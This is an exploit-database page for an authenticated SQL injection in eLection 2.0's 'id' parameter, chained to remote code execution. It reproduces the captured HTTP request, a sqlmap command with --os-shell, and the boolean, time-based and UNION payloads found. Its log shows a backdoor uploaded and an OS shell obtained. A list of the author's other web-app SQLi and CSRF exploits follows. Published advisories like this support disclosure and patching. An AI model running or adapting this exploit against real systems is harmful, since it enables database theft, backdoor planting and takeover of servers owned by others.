Search for hundreds of thousands of exploits

"eLection 2.0 - 'id' SQL Injection"

Author

Exploit author

J3rryBl4nks

Platform

Exploit platform

php

Release date

Exploit published date

2020-02-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Title: eLection 2.0 - 'id' SQL Injection
# Date: 2020-02-21
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/
# Software Link: https://sourceforge.net/projects/election-by-tripath/files/#Version 2.0
# Tested on Ubuntu 19/Kali Rolling

# The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution:
# Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file:

POST /election/admin/ajax/op_kandidat.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/election/admin/kandidat.php?_
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close
Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us

aksi=fetch&id=256



Send the request to SQLMap with the following parameters:

    sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id


SQLMap will find the injection:

    ---
    Parameter: id (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: aksi=fetch&id=256 AND 8584=8584

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ)

        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: aksi=fetch&id=-9798 UNION ALL SELECT NULL,NULL,CONCAT(0x7170707171,0x676d755461434e486f49475051707357694861534e664f416f434269487042545a76454f5843584b,0x71717a7871),NULL,NULL-- dWMc
    ---


    [09:39:07] [WARNING] unable to automatically parse any web server path
    [09:39:07] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method
    [09:39:07] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpumlfm.php
    [09:39:07] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpbpfkq.php
    [09:39:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>


Due to the way the setup of the application requires you to change permissions on the directory of the web app, you should be able to get a shell.

https://github.com/J3rryBl4nks/eLection-TriPath-/blob/master/SQLiIntoRCE.md
Release DateTitleTypePlatformAuthor
2020-02-24"CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)"webappsphpJ3rryBl4nks
2020-02-24"eLection 2.0 - 'id' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'by' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'users' SQL Injection"webappsphpJ3rryBl4nks
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-03"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)"webappsphpJ3rryBl4nks
2020-01-29"Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)"webappsphpJ3rryBl4nks
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48122/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.